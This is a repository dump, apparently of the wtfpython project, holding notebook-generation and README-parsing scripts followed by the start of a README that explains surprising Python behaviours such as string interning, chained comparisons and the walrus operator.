`lines`. """ tokens_to_remove = STATEMENT_PREFIXES result = [] is_print_present = False for line in lines: line = remove_from_beginning(tokens_to_remove, line) if line.startswith("print ") or line.startswith("print("): is_print_present = True result.append(line) return is_print_present, result def convert_to_cells(cell_contents, read_only): """ Converts a list of dictionaries containing markdown and code cells into a Jupyter notebook. :param cell_contents: A list of dictionaries, each dictionary representing either a markdown or code cell. Each dictionary should have the following keys: "type", which is either "markdown" or "code", and "value". The value for type = 'markdown' is the content as string, whereas the value for type = 'code' is another dictionary with two keys, statements and output. The statements key contains all lines in between ```py\n``` (including) until ```\n```, while output contains all lines after ```.output py\n```. :type cell_contents: List[Dict] :param read_only (optional): If True then only print outputs are included in converted cells. Default False :type read_only (optional): bool :returns A Jupyter notebook containing all cells from input parameter `cell_contents`. Each converted cell has metadata attribute collapsed set to true if it's code-cell otherwise None if it's markdow-cell. """ cells = [] for stuff in cell_contents: if stuff["type"] == "markdown": # todo add metadata later cells.append( { "cell_type": "markdown", "metadata": {}, "source": stuff["value"] } ) elif stuff["type"] == "code": if read_only: # Skip read only # TODO: Fix cells.append( { "cell_type": "markdown", "metadata": {}, "source": ["```py\n"] + stuff["statements"] + ["```\n"] + ["```py\n"] + stuff['output'] + ["```\n"] } ) continue is_print_present, sanitized_code = inspect_and_sanitize_code_lines(stuff["statements"]) if is_print_present: cells.append( { "cell_type": "code", "metadata": { "collapsed": True, }, "execution_count": None, "outputs": [{ "name": "stdout", "output_type": "stream", "text": stuff["output"] }], "source": sanitized_code } ) else: cells.append( { "cell_type": "code", "execution_count": None, "metadata": { "collapsed": True }, "outputs": [{ "data": { "text/plain": stuff["output"] }, "output_type": "execute_result", "metadata": {}, "execution_count": None }], "source": sanitized_code } ) return cells def convert_to_notebook(pre_examples_content, parsed_json, post_examples_content): """ Convert a JSON file containing the examples to a Jupyter Notebook. """ result = { "cells": [], "metadata": {}, "nbformat": 4, "nbformat_minor": 2 } notebook_path = "wtf.ipynb" result["cells"] += convert_to_cells([generate_markdown_block(pre_examples_content)], False) for example in parsed_json: parts = example["parts"] build_up = parts.get("build_up") explanation = parts.get("explanation") read_only = example.get("read_only") if build_up: result["cells"] += convert_to_cells(build_up, read_only) if explanation: result["cells"] += convert_to_cells(explanation, read_only) result["cells"] += convert_to_cells([generate_markdown_block(post_examples_content)], False) #pprint.pprint(result, indent=2) with open(notebook_path, "w") as f: json.dump(result, f, indent=2) with open(fpath, 'r+', encoding="utf-8") as f: lines = iter(f.readlines()) line = next(lines) result = [] pre_examples_phase = True pre_stuff = [] post_stuff = [] try: while True: if line.startswith("## "): pre_examples_phase = False # A section is encountered current_section_name = line.replace("## ", "").strip() section_text = [] line = next(lines) # Until a new section is encountered while not (line.startswith("## ") or line.startswith("# ")): # check if it's a H3 if line.startswith("### "): # An example is encountered title_line = line line = next(lines) read_only = False while line.strip() == "" or line.startswith('<!--'): #TODO: Capture example ID here using regex. if '<!-- read-only -->' in line: read_only = True line = next(lines) example_details = { "id": current_example, "title": title_line.replace("### ", ""), "section": current_section_name, "read_only": read_only } line, example_details["parts"] = parse_example_parts(lines, title_line, line) result.append(example_details) current_example += 1 else: section_text.append(line) line = next(lines) else: if pre_examples_phase: pre_stuff.append(line) else: post_stuff.append(line) line = next(lines) except StopIteration as e: #pprint.pprint(result, indent=2) pre_stuff.append(HOSTED_NOTEBOOK_INSTRUCTIONS) result.sort(key = lambda x: x["read_only"]) convert_to_notebook(pre_stuff, result, post_stuff) File: irrelevant/obsolete/generate_contributions.py """ This script parses the README.md and generates the table `CONTRIBUTORS.md`. No longer works since we've moved on contributors to CONTRIBUTORS.md entirely. """ import pprint import re import requests regex = ("[sS]uggested by @(\S+) in \[this\]\(https:\/\/github\.com\/satwikkansal" "\/wtf[pP]ython\/issues\/(\d+)\) issue") fname = "README.md" contribs = {} table_header = """ | Contributor | Github | Issues | |-------------|--------|--------| """ table_row = '| {} | [{}](https://github.com/{}) | {} |' issue_format = '[#{}](https:/github.com/satwikkansal/wtfpython/issues/{})' rows_so_far = [] github_rest_api = "https://api.github.com/users/{}" with open(fname, 'r') as f: file_content = f.read() matches = re.findall(regex, file_content) for match in matches: if contribs.get(match[0]) and match[1] not in contribs[match[0]]: contribs[match[0]].append(match[1]) else: contribs[match[0]] = [match[1]] for handle, issues in contribs.items(): issue_string = ', '.join([issue_format.format(i, i) for i in issues]) resp = requests.get(github_rest_api.format(handle)) name = handle if resp.status_code == 200: pprint.pprint(resp.json()['name']) else: print(handle, resp.content) rows_so_far.append(table_row.format(name, handle, handle, issue_string)) print(table_header + "\n".join(rows_so_far)) File: irrelevant/obsolete/parse_readme.py # -*- coding: utf-8 -*- """ This inefficient module would parse the README.md in the initial version of WTFPython, and enable me to categorize and reorder a hell lot of examples with the help of the file `add_categories` (part of which is automatically generated). After the refactor, this module would not work now with necessary updates in the code. """ try: raw_input # Python 2 except NameError: raw_input = input # Python 3 fname = "README.md" snippets = [] with open(fname, 'r') as f: lines = iter(f.readlines()) line = lines.next() try: while True: # check if it's a H3 if line.startswith("### "): title = line.replace("### ", "") description = [] next_line = lines.next() # store lines till an H4 (explanation) is encountered while not next_line.startswith("#### "): description.append(next_line) next_line = lines.next() explanation = [] # store lines again until --- or another H3 is encountered while not (next_line.startswith("---") or next_line.startswith("### ")): explanation.append(next_line) next_line = lines.next() # Store the results finally snippets.append({ "title": title, "description": '\n'.join(description), "explanation": '\n'.join(explanation) }) line = next_line else: line = lines.next() except StopIteration: snippets.append({ "title": title, "description": '\n'.join(description), "explanation": '\n'.join(explanation) }) ''' # Create a file file_content = "\n\n".join([snip["title"] for snip in snippets]) with open("add_categories", "w") as f: f.write(file_content) ''' snips_by_title = {} with open("add_categories", "r") as f: content = iter(f.readlines()) try: while True: title = content.next() cat = content.next().strip() is_new = True if cat[-1]=="*" else False cat = cat.replace('*','') snips_by_title[title] = { "category": cat, "is_new": is_new } content.next() except StopIteration: pass for idx, snip in enumerate(snippets): snippets[idx]["category"] = snips_by_title[snip["title"]]["category"] snippets[idx]["is_new"] = snips_by_title[snip["title"]]["is_new"] snips_by_cat = {} for snip in snippets: cat = snip["category"] if not snips_by_cat.get(cat): snips_by_cat[cat] = [] snips_by_cat[cat].append(snip) snippet_template = """ ### ▶ {title}{is_new} {description} {explanation} --- """ category_template = """ --- ## {category} {content} """ result = "" category_names = { "a": "Appearances are Deceptive!", "t": "The Hiddent treasures", "f": "Strain your Brain", "c": "Be careful of these", "m": "Miscallaneous" } categories_in_order = ["a", "t", "f", "c", "m"] for category in categories_in_order: snips = snips_by_cat[category] for i, snip in enumerate(snips): print(i, ":", snip["title"]) content = "" for _ in snips: snip = snips[int(raw_input())] is_new = " *" if snip["is_new"] else "" content += snippet_template.format(title=snip["title"].strip(), is_new=is_new, description=snip["description"].strip().replace("\n\n", "\n"), explanation=snip["explanation"].strip().replace("\n\n", "\n")) result += category_template.format(category=category_names[category], content=content.replace("\n\n\n", "\n\n")) with open("generated.md", "w") as f: f.write(result.replace("\n\n\n", "\n\n")) print("Done!")
<p align="center"><img src="/images/logo.png#gh-light-mode-only" alt=""><img src="/images/logo-dark.png#gh-dark-mode-only" alt=""></p> <h1 align="center">What the f*ck Python! 😱</h1> <p align="center">Exploring and understanding Python through surprising snippets.</p> Translations: [Chinese 中文](https://github.com/leisurelicht/wtfpython-cn) | [Vietnamese Tiếng Việt](https://github.com/vuduclyunitn/wtfptyhon-vi) | [Spanish Español](https://web.archive.org/web/20220511161045/https://github.com/JoseDeFreitas/wtfpython-es) | [Korean 한국어](https://github.com/buttercrab/wtfpython-ko) | [Russian Русский](https://github.com/satwikkansal/wtfpython/tree/master/translations/ru-russian) | [German Deutsch](https://github.com/BenSt099/wtfpython) | [Add translation](https://github.com/satwikkansal/wtfpython/issues/new?title=Add%20translation%20for%20[LANGUAGE]&body=Expected%20time%20to%20finish:%20[X]%20weeks.%20I%27ll%20start%20working%20on%20it%20from%20[Y].) Other modes: [Interactive Website](https://wtfpython-interactive.vercel.app) | [Interactive Notebook](https://colab.research.google.com/github/satwikkansal/wtfpython/blob/master/irrelevant/wtf.ipynb) | [CLI](https://pypi.python.org/pypi/wtfpython) Python, being a beautifully designed high-level and interpreter-based programming language, provides us with many features for the programmer's comfort. But sometimes, the outcomes of a Python snippet may not seem obvious at first sight. Here's a fun project attempting to explain what exactly is happening under the hood for some counter-intuitive snippets and lesser-known features in Python. While some of the examples you see below may not be WTFs in the truest sense, but they'll reveal some of the interesting parts of Python that you might be unaware of. I find it a nice way to learn the internals of a programming language, and I believe that you'll find it interesting too! If you're an experienced Python programmer, you can take it as a challenge to get most of them right in the first attempt. You may have already experienced some of them before, and I might be able to revive sweet old memories of yours! :sweat_smile: PS: If you're a returning reader, you can learn about the new modifications [here](https://github.com/satwikkansal/wtfpython/releases/) (the examples marked with asterisk are the ones added in the latest major revision). So, here we go... # Table of Contents <!-- Generated using "markdown-toc -i README.md --maxdepth 3"--> <!-- toc --> - [Structure of the Examples](#structure-of-the-examples) + [▶ Some fancy Title](#-some-fancy-title) - [Usage](#usage) - [👀 Examples](#-examples) * [Section: Strain your brain!](#section-strain-your-brain) + [▶ First things first! *](#-first-things-first-) + [▶ Strings can be tricky sometimes](#-strings-can-be-tricky-sometimes) + [▶ Be careful with chained operations](#-be-careful-with-chained-operations) + [▶ How not to use `is` operator](#-how-not-to-use-is-operator) + [▶ Hash brownies](#-hash-brownies) + [▶ Deep down, we're all the same.](#-deep-down-were-all-the-same) + [▶ Disorder within order *](#-disorder-within-order-) + [▶ Keep trying... *](#-keep-trying-) + [▶ For what?](#-for-what) + [▶ Evaluation time discrepancy](#-evaluation-time-discrepancy) + [▶ `is not ...` is not `is (not ...)`](#-is-not--is-not-is-not-) + [▶ A tic-tac-toe where X wins in the first attempt!](#-a-tic-tac-toe-where-x-wins-in-the-first-attempt) + [▶ Schrödinger's variable](#-schrödingers-variable-) + [▶ The chicken-egg problem *](#-the-chicken-egg-problem-) + [▶ Subclass relationships](#-subclass-relationships) + [▶ Methods equality and identity](#-methods-equality-and-identity) + [▶ All-true-ation *](#-all-true-ation-) + [▶ The surprising comma](#-the-surprising-comma) + [▶ Strings and the backslashes](#-strings-and-the-backslashes) + [▶ not knot!](#-not-knot) + [▶ Half triple-quoted strings](#-half-triple-quoted-strings) + [▶ What's wrong with booleans?](#-whats-wrong-with-booleans) + [▶ Class attributes and instance attributes](#-class-attributes-and-instance-attributes) + [▶ yielding None](#-yielding-none) + [▶ Yielding from... return! *](#-yielding-from-return-) + [▶ Nan-reflexivity *](#-nan-reflexivity-) + [▶ Mutating the immutable!](#-mutating-the-immutable) + [▶ The disappearing variable from outer scope](#-the-disappearing-variable-from-outer-scope) + [▶ The mysterious key type conversion](#-the-mysterious-key-type-conversion) + [▶ Let's see if you can guess this?](#-lets-see-if-you-can-guess-this) + [▶ Exceeds the limit for integer string conversion](#-exceeds-the-limit-for-integer-string-conversion) * [Section: Slippery Slopes](#section-slippery-slopes) + [▶ Modifying a dictionary while iterating over it](#-modifying-a-dictionary-while-iterating-over-it) + [▶ Stubborn `del` operation](#-stubborn-del-operation) + [▶ The out of scope variable](#-the-out-of-scope-variable) + [▶ Deleting a list item while iterating](#-deleting-a-list-item-while-iterating) + [▶ Lossy zip of iterators *](#-lossy-zip-of-iterators-) + [▶ Loop variables leaking out!](#-loop-variables-leaking-out) + [▶ Beware of default mutable arguments!](#-beware-of-default-mutable-arguments) + [▶ Catching the Exceptions](#-catching-the-exceptions) + [▶ Same operands, different story!](#-same-operands-different-story) + [▶ Name resolution ignoring class scope](#-name-resolution-ignoring-class-scope) + [▶ Rounding like a banker *](#-rounding-like-a-banker-) + [▶ Needles in a Haystack *](#-needles-in-a-haystack-) + [▶ Splitsies *](#-splitsies-) + [▶ Wild imports *](#-wild-imports-) + [▶ All sorted? *](#-all-sorted-) + [▶ Midnight time doesn't exist?](#-midnight-time-doesnt-exist) * [Section: The Hidden treasures!](#section-the-hidden-treasures) + [▶ Okay Python, Can you make me fly?](#-okay-python-can-you-make-me-fly) + [▶ `goto`, but why?](#-goto-but-why) + [▶ Brace yourself!](#-brace-yourself) + [▶ Let's meet Friendly Language Uncle For Life](#-lets-meet-friendly-language-uncle-for-life) + [▶ Even Python understands that love is complicated](#-even-python-understands-that-love-is-complicated) + [▶ Yes, it exists!](#-yes-it-exists) + [▶ Ellipsis *](#-ellipsis-) + [▶ Inpinity](#-inpinity) + [▶ Let's mangle](#-lets-mangle) * [Section: Appearances are deceptive!](#section-appearances-are-deceptive) + [▶ Skipping lines?](#-skipping-lines) + [▶ Teleportation](#-teleportation) + [▶ Well, something is fishy...](#-well-something-is-fishy) * [Section: Miscellaneous](#section-miscellaneous) + [▶ `+=` is faster](#--is-faster) + [▶ Let's make a giant string!](#-lets-make-a-giant-string) + [▶ Slowing down `dict` lookups *](#-slowing-down-dict-lookups-) + [▶ Bloating instance `dict`s *](#-bloating-instance-dicts-) + [▶ Minor Ones *](#-minor-ones-) - [Contributing](#contributing) - [Acknowledgements](#acknowledgements) - [🎓 License](#-license) * [Surprise your friends as well!](#surprise-your-friends-as-well) * [More content like this?](#more-content-like-this) <!-- tocstop --> # Structure of the Examples All the examples are structured like below: > ### ▶ Some fancy Title > > ```py > # Set up the code. > # Preparation for the magic... > ``` > > **Output (Python version(s)):** > > ```py > >>> triggering_statement > Some unexpected output > ``` > (Optional): One line describing the unexpected output. > > > #### 💡 Explanation: > > * Brief explanation of what's happening and why is it happening. > ```py > # Set up code > # More examples for further clarification (if necessary) > ``` > **Output (Python version(s)):** > > ```py > >>> trigger # some example that makes it easy to unveil the magic > # some justified output > ``` **Note:** All the examples are tested on Python 3.5.2 interactive interpreter, and they should work for all the Python versions unless explicitly specified before the output. # Usage A nice way to get the most out of these examples, in my opinion, is to read them in sequential order, and for every example: - Carefully read the initial code for setting up the example. If you're an experienced Python programmer, you'll successfully anticipate what's going to happen next most of the time. - Read the output snippets and, + Check if the outputs are the same as you'd expect. + Make sure if you know the exact reason behind the output being the way it is. - If the answer is no (which is perfectly okay), take a deep breath, and read the explanation (and if you still don't understand, shout out! and create an issue [here](https://github.com/satwikkansal/wtfpython/issues/new)). - If yes, give a gentle pat on your back, and you may skip to the next example. PS: You can also read WTFPython at the command line using the [pypi package](https://pypi.python.org/pypi/wtfpython), ```sh $ pip install wtfpython -U $ wtfpython ``` --- # 👀 Examples ## Section: Strain your brain! ### ▶ First things first! * <!-- Example ID: d3d73936-3cf1-4632-b5ab-817981338863 --> <!-- read-only --> For some reason, the Python 3.8's "Walrus" operator (`:=`) has become quite popular. Let's check it out, 1\. ```py # Python version 3.8+ >>> a = "wtf_walrus" >>> a 'wtf_walrus' >>> a := "wtf_walrus" File "<stdin>", line 1 a := "wtf_walrus" ^ SyntaxError: invalid syntax >>> (a := "wtf_walrus") # This works though 'wtf_walrus' >>> a 'wtf_walrus' ``` 2 \. ```py # Python version 3.8+ >>> a = 6, 9 >>> a (6, 9) >>> (a := 6, 9) (6, 9) >>> a 6 >>> a, b = 6, 9 # Typical unpacking >>> a, b (6, 9) >>> (a, b = 16, 19) # Oops File "<stdin>", line 1 (a, b = 16, 19) ^ SyntaxError: invalid syntax >>> (a, b := 16, 19) # This prints out a weird 3-tuple (6, 16, 19) >>> a # a is still unchanged? 6 >>> b 16 ``` #### 💡 Explanation **Quick walrus operator refresher** The Walrus operator (`:=`) was introduced in Python 3.8, it can be useful in situations where you'd want to assign values to variables within an expression. ```py def some_func(): # Assume some expensive computation here # time.sleep(1000) return 5 # So instead of, if some_func(): print(some_func()) # Which is bad practice since computation is happening twice # or a = some_func() if a: print(a) # Now you can concisely write if a := some_func(): print(a) ``` **Output (> 3.8):** ```py 5 5 5 ``` This saved one line of code, and implicitly prevented invoking `some_func` twice. - Unparenthesized "assignment expression" (use of walrus operator), is restricted at the top level, hence the `SyntaxError` in the `a := "wtf_walrus"` statement of the first snippet. Parenthesizing it worked as expected and assigned `a`. - As usual, parenthesizing of an expression containing `=` operator is not allowed. Hence the syntax error in `(a, b = 6, 9)`. - The syntax of the Walrus operator is of the form `NAME:= expr`, where `NAME` is a valid identifier, and `expr` is a valid expression. Hence, iterable packing and unpacking are not supported which means, - `(a := 6, 9)` is equivalent to `((a := 6), 9)` and ultimately `(a, 9) ` (where `a`'s value is 6') ```py >>> (a := 6, 9) == ((a := 6), 9) True >>> x = (a := 696, 9) >>> x (696, 9) >>> x[0] is a # Both reference same memory location True ``` - Similarly, `(a, b := 16, 19)` is equivalent to `(a, (b := 16), 19)` which is nothing but a 3-tuple. --- ### ▶ Strings can be tricky sometimes <!-- Example ID: 30f1d3fc-e267-4b30-84ef-4d9e7091ac1a ---> 1\. ```py >>> a = "some_string" >>> id(a) 140420665652016 >>> id("some" + "_" + "string") # Notice that both the ids are same. 140420665652016 ``` 2\. ```py >>> a = "wtf" >>> b = "wtf" >>> a is b True >>> a = "wtf!" >>> b = "wtf!" >>> a is b False ``` 3\. ```py >>> a, b = "wtf!", "wtf!" >>> a is b # All versions except 3.7.x True >>> a = "wtf!"; b = "wtf!" >>> a is b # This will print True or False depending on where you're invoking it (python shell / ipython / as a script) False ``` ```py # This time in file some_file.py a = "wtf!" b = "wtf!" print(a is b) # prints True when the module is invoked! ``` 4\. **Output (< Python3.7 )** ```py >>> 'a' * 20 is 'aaaaaaaaaaaaaaaaaaaa' True >>> 'a' * 21 is 'aaaaaaaaaaaaaaaaaaaaa' False ``` Makes sense, right? #### 💡 Explanation: + The behavior in first and second snippets is due to a CPython optimization (called string interning) that tries to use existing immutable objects in some cases rather than creating a new object every time. + After being "interned," many variables may reference the same string object in memory (saving memory thereby). + In the snippets above, strings are implicitly interned. The decision of when to implicitly intern a string is implementation-dependent. There are some rules that can be used to guess if a string will be interned or not: * All length 0 and length 1 strings are interned. * Strings are interned at compile time (`'wtf'` will be interned but `''.join(['w', 't', 'f'])` will not be interned) * Strings that are not composed of ASCII letters, digits or underscores, are not interned. This explains why `'wtf!'` was not interned due to `!`. CPython implementation of this rule can be found [here](https://github.com/python/cpython/blob/3.6/Objects/codeobject.c#L19) ![image](/images/string-intern/string_intern.png) + When `a` and `b` are set to `"wtf!"` in the same line, the Python interpreter creates a new object, then references the second variable at the same time. If you do it on separate lines, it doesn't "know" that there's already `"wtf!"` as an object (because `"wtf!"` is not implicitly interned as per the facts mentioned above). It's a compile-time optimization. This optimization doesn't apply to 3.7.x versions of CPython (check this [issue](https://github.com/satwikkansal/wtfpython/issues/100) for more discussion). + A compile unit in an interactive environment like IPython consists of a single statement, whereas it consists of the entire module in case of modules. `a, b = "wtf!", "wtf!"` is single statement, whereas `a = "wtf!"; b = "wtf!"` are two statements in a single line. This explains why the identities are different in `a = "wtf!"; b = "wtf!"`, and also explain why they are same when invoked in `some_file.py` + The abrupt change in the output of the fourth snippet is due to a [peephole optimization](https://en.wikipedia.org/wiki/Peephole_optimization) technique known as Constant folding. This means the expression `'a'*20` is replaced by `'aaaaaaaaaaaaaaaaaaaa'` during compilation to save a few clock cycles during runtime. Constant folding only occurs for strings having a length of less than 21. (Why? Imagine the size of `.pyc` file generated as a result of the expression `'a'*10**10`). [Here's](https://github.com/python/cpython/blob/3.6/Python/peephole.c#L288) the implementation source for the same. + Note: In Python 3.7, Constant folding was moved out from peephole optimizer to the new AST optimizer with some change in logic as well, so the fourth snippet doesn't work for Python 3.7. You can read more about the change [here](https://bugs.python.org/issue11549). --- ### ▶ Be careful with chained operations <!-- Example ID: 07974979-9c86-4720-80bd-467aa19470d9 ---> ```py >>> (False == False) in [False] # makes sense False >>> False == (False in [False]) # makes sense False >>> False == False in [False] # now what? True >>> True is False == False False >>> False is False is False True >>> 1 > 0 < 1 True >>> (1 > 0) < 1 False >>> 1 > (0 < 1) False ``` #### 💡 Explanation: As per https://docs.python.org/3/reference/expressions.html#comparisons > Formally, if a, b, c, ..., y, z are expressions and op1, op2, ..., opN are comparison operators, then a op1 b op2 c ... y opN z is equivalent to a op1 b and b op2 c and ... y opN z, except that each expression is evaluated at most once. While such behavior might seem silly to you in the above examples, it's fantastic with stuff like `a == b == c` and `0 <= x <= 100`. * `False is False is False` is equivalent to `(False is False) and (False is False)` * `True is False == False` is equivalent to `(True is False) and (False == False)` and since the first part of the statement (`True is False`) evaluates to `False`, the overall expression evaluates to `False`. * `1 > 0 < 1` is equivalent to `(1 > 0) and (0 < 1)` which evaluates to `True`. * The expression `(1 > 0) < 1` is equivalent to `True < 1` and ```py >>> int(True) 1 >>> True + 1 #not relevant for this example, but just for fun 2 ``` So, `1 < 1` evaluates to `False` --- ### ▶ How not to use `is` operator <!-- Example ID: 230fa2ac-ab36-4ad1-b675-5f5a1c1a6217 ---> The following is a very famous example present all over the internet. 1\. ```py >>> a = 256 >>> b = 256 >>> a is b True >>> a = 257 >>> b = 257 >>> a is b False ``` 2\. ```py >>> a = [] >>> b = [] >>> a is b False >>> a = tuple() >>> b = tuple() >>> a is b True ``` 3\. **Output** ```py >>> a, b = 257, 257 >>> a is b True ``` **Output (Python 3.7.x specifically)** ```py >>> a, b = 257, 257 >>> a is b False ``` #### 💡 Explanation: **The difference between `is` and `==`** * `is` operator checks if both the operands refer to the same object (i.e., it checks if the identity of the operands matches or not). * `==` operator compares the values of both the operands and checks if they are the same. * So `is` is for reference equality and `==` is for value equality. An example to clear things up, ```py >>> class A: pass >>> A() is A() # These are two empty objects at two different memory locations. False ``` **`256` is an existing object but `257` isn't** When you start up python the numbers from `-5` to `256` will be allocated. These numbers are used a lot, so it makes sense just to have them ready. Quoting from https://docs.python.org/3/c-api/long.html > The current implementation keeps an array of integer objects for all integers between -5 and 256, when you create an int in that range you just get back a reference to the existing object. So it should be possible to change the value of 1. I suspect the behavior of Python, in this case, is undefined. :-) ```py >>> id(256) 10922528 >>> a = 256 >>> b = 256 >>> id(a) 10922528 >>> id(b) 10922528 >>> id(257) 140084850247312 >>> x = 257 >>> y = 257 >>> id(x) 140084850247440 >>> id(y) 140084850247344 ``` Here the interpreter isn't smart enough while executing `y = 257` to recognize that we've already created an integer of the value `257,` and so it goes on to create another object in the memory. Similar optimization applies to other **immutable** objects like empty tuples as well. Since lists are mutable, that's why `[] is []` will return `False` and `() is ()` will return `True`. This explains our second snippet. Let's move on to the third one, **Both `a` and `b` refer to the same object when initialized with same value in the same line.** **Output** ```py >>> a, b = 257, 257 >>> id(a) 140640774013296 >>> id(b) 140640774013296 >>> a = 257 >>> b = 257 >>> id(a) 140640774013392 >>> id(b) 140640774013488 ``` * When a and b are set to `257` in the same line, the Python interpreter creates a new object, then references the second variable at the same time. If you do it on separate lines, it doesn't "know" that there's already `257` as an object. * It's a compiler optimization and specifically applies to the interactive environment. When you enter two lines in a live interpreter, they're compiled separately, therefore optimized separately. If you were to try this example in a `.py` file, you would not see the same behavior, because the file is compiled all at once. This optimization is not limited to integers, it works for other immutable data types like strings (check the "Strings are tricky example") and floats as well, ```py >>> a, b = 257.0, 257.0 >>> a is b True ``` * Why didn't this work for Python 3.7? The abstract reason is because such compiler optimizations are implementation specific (i.e. may change with version, OS, etc). I'm still figuring out what exact implementation change cause the issue, you can check out this [issue](https://github.com/satwikkansal/wtfpython/issues/100) for updates. --- ### ▶ Hash brownies <!-- Example ID: eb17db53-49fd-4b61-85d6-345c5ca213ff ---> 1\. ```py some_dict = {} some_dict[5.5] = "JavaScript" some_dict[5.0] = "Ruby" some_dict[5] = "Python" ``` **Output:** ```py >>> some_dict[5.5] "JavaScript" >>> some_dict[5.0] # "Python" destroyed the existence of "Ruby"? "Python" >>> some_dict[5] "Python" >>> complex_five = 5 + 0j >>> type(complex_five) complex >>> some_dict[complex_five] "Python" ``` So, why is Python all over the place? #### 💡 Explanation * Uniqueness of keys in a Python dictionary is by *equivalence*, not identity. So even though `5`, `5.0`, and `5 + 0j` are distinct objects of different types, since they're equal, they can't both be in the same `dict` (or `set`). As soon as you insert any one of them, attempting to look up any distinct but equivalent key will succeed with the original mapped value (rather than failing with a `KeyError`): ```py >>> 5 == 5.0 == 5 + 0j True >>> 5 is not 5.0 is not 5 + 0j True >>> some_dict = {} >>> some_dict[5.0] = "Ruby" >>> 5.0 in some_dict True >>> (5 in some_dict) and (5 + 0j in some_dict) True ``` * This applies when setting an item as well. So when you do `some_dict[5] = "Python"`, Python finds the existing item with equivalent key `5.0 -> "Ruby"`, overwrites its value in place, and leaves the original key alone. ```py >>> some_dict {5.0: 'Ruby'} >>> some_dict[5] = "Python" >>> some_dict {5.0: 'Python'} ``` * So how can we update the key to `5` (instead of `5.0`)? We can't actually do this update in place, but what we can do is first delete the key (`del some_dict[5.0]`), and then set it (`some_dict[5]`) to get the integer `5` as the key instead of floating `5.0`, though this should be needed in rare cases. * How did Python find `5` in a dictionary containing `5.0`? Python does this in constant time without having to scan through every item by using hash functions. When Python looks up a key `foo` in a dict, it first computes `hash(foo)` (which runs in constant-time). Since in Python it is required that objects that compare equal also have the same hash value ([docs](https://docs.python.org/3/reference/datamodel.html#object.__hash__) here), `5`, `5.0`, and `5 + 0j` have the same hash value. ```py >>> 5 == 5.0 == 5 + 0j True >>> hash(5) == hash(5.0) == hash(5 + 0j) True ``` **Note:** The inverse is not necessarily true: Objects with equal hash values may themselves be unequal. (This causes what's known as a [hash collision](https://en.wikipedia.org/wiki/Collision_(computer_science)), and degrades the constant-time performance that hashing usually provides.) --- ### ▶ Deep down, we're all the same. <!-- Example ID: 8f99a35f-1736-43e2-920d-3b78ec35da9b ---> ```py class WTF: pass ``` **Output:** ```py >>> WTF() == WTF() # two different instances can't be equal False >>> WTF() is WTF() # identities are also different False >>> hash(WTF()) == hash(WTF()) # hashes _should_ be different as well True >>> id(WTF()) == id(WTF()) True ``` #### 💡 Explanation: * When `id` was called, Python created a `WTF` class object and passed it to the `id` function. The `id` function takes its `id` (its memory location), and throws away the object. The object is destroyed. * When we do this twice in succession, Python allocates the same memory location to this second object as well. Since (in CPython) `id` uses the memory location as the object id, the id of the two objects is the same. * So, the object's id is unique only for the lifetime of the object. After the object is destroyed, or before it is created, something else can have the same id. * But why did the `is` operator evaluate to `False`? Let's see with this snippet. ```py class WTF(object): def __init__(self): print("I") def __del__(self): print("D") ``` **Output:** ```py >>> WTF() is WTF() I I D D False >>> id(WTF()) == id(WTF()) I D I D True ``` As you may observe, the order in which the objects are destroyed is what made all the difference here. --- ### ▶ Disorder within order * <!-- Example ID: 91bff1f8-541d-455a-9de4-6cd8ff00ea66 ---> ```py from collections import OrderedDict dictionary = dict() dictionary[1] = 'a'; dictionary[2] = 'b'; ordered_dict = OrderedDict() ordered_dict[1] = 'a'; ordered_dict[2] = 'b'; another_ordered_dict = OrderedDict() another_ordered_dict[2] = 'b'; another_ordered_dict[1] = 'a'; class DictWithHash(dict): """ A dict that also implements __hash__ magic. """ __hash__ = lambda self: 0 class OrderedDictWithHash(OrderedDict): """ An OrderedDict that also implements __hash__ magic. """ __hash__ = lambda self: 0 ``` **Output** ```py >>> dictionary == ordered_dict # If a == b True >>> dictionary == another_ordered_dict # and b == c True >>> ordered_dict == another_ordered_dict # then why isn't c == a ?? False # We all know that a set consists of only unique elements, # let's try making a set of these dictionaries and see what happens... >>> len({dictionary, ordered_dict, another_ordered_dict}) Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: unhashable type: 'dict' # Makes sense since dict don't have __hash__ implemented, let's use # our wrapper classes. >>> dictionary = DictWithHash() >>> dictionary[1] = 'a'; dictionary[2] = 'b'; >>> ordered_dict = OrderedDictWithHash() >>> ordered_dict[1] = 'a'; ordered_dict[2] = 'b'; >>> another_ordered_dict = OrderedDictWithHash() >>> another_ordered_dict[2] = 'b'; another_ordered_dict[1] = 'a'; >>> len({dictionary, ordered_dict, another_ordered_dict}) 1 >>> len({ordered_dict, another_ordered_dict, dictionary}) # changing the order 2 ``` What is going on here? #### 💡 Explanation: - The reason why intransitive equality didn't hold among `dictionary`, `ordered_dict` and `another_ordered_dict` is because of the way `__eq__` method is implemented in `OrderedDict` class. From the [docs](https://docs.python.org/3/library/collections.html#ordereddict-objects) > Equality tests between OrderedDict objects are order-sensitive and are implemented as `list(od1.items())==list(od2.items())`. Equality tests between `OrderedDict` objects and other Mapping objects are order-insensitive like regular dictionaries. - The reason for this equality in behavior is that it allows `OrderedDict` objects to be directly substituted anywhere a regular dictionary is used. - Okay, so why did changing the order affect the length of the generated `set` object? The answer is the lack of intransitive equality only. Since sets are "unordered" collections of unique elements, the order in which elements are inserted shouldn't matter. But in this case, it does matter. Let's break it down a bit, ```py >>> some_set = set() >>> some_set.add(dictionary) # these are the mapping objects from the snippets above >>> ordered_dict in some_set True >>> some_set.add(ordered_dict) >>> len(some_set) 1 >>> another_ordered_dict in some_set True >>> some_set.add(another_ordered_dict) >>> len(some_set) 1 >>> another_set = set() >>> another_set.add(ordered_dict) >>> another_ordered_dict in another_set False >>> another_set.add(another_ordered_dict) >>> len(another_set) 2 >>> dictionary in another_set True >>> another_set.add(another_ordered_dict) >>> len(another_set) 2 ``` So the inconsistency is due to `another_ordered_dict in another_set` being `False` because `ordered_dict` was already present in `another_set` and as observed before, `ordered_dict == another_ordered_dict` is `False`. --- ### ▶ Keep trying... * <!-- Example ID: b4349443-e89f-4d25-a109-82616be9d41a ---> ```py def some_func(): try: return 'from_try' finally: return 'from_finally' def another_func(): for _ in range(3): try: continue finally: print("Finally!") def one_more_func(): # A gotcha! try: for i in range(3): try: 1 / i except ZeroDivisionError: # Let's throw it here and handle it outside for loop raise ZeroDivisionError("A trivial divide by zero error") finally: print("Iteration", i) break except ZeroDivisionError as e: print("Zero division error occurred", e) ``` **Output:** ```py >>> some_func() 'from_finally' >>> another_func() Finally! Finally! Finally! >>> 1 / 0 Traceback (most recent call last): File "<stdin>", line 1, in <module> 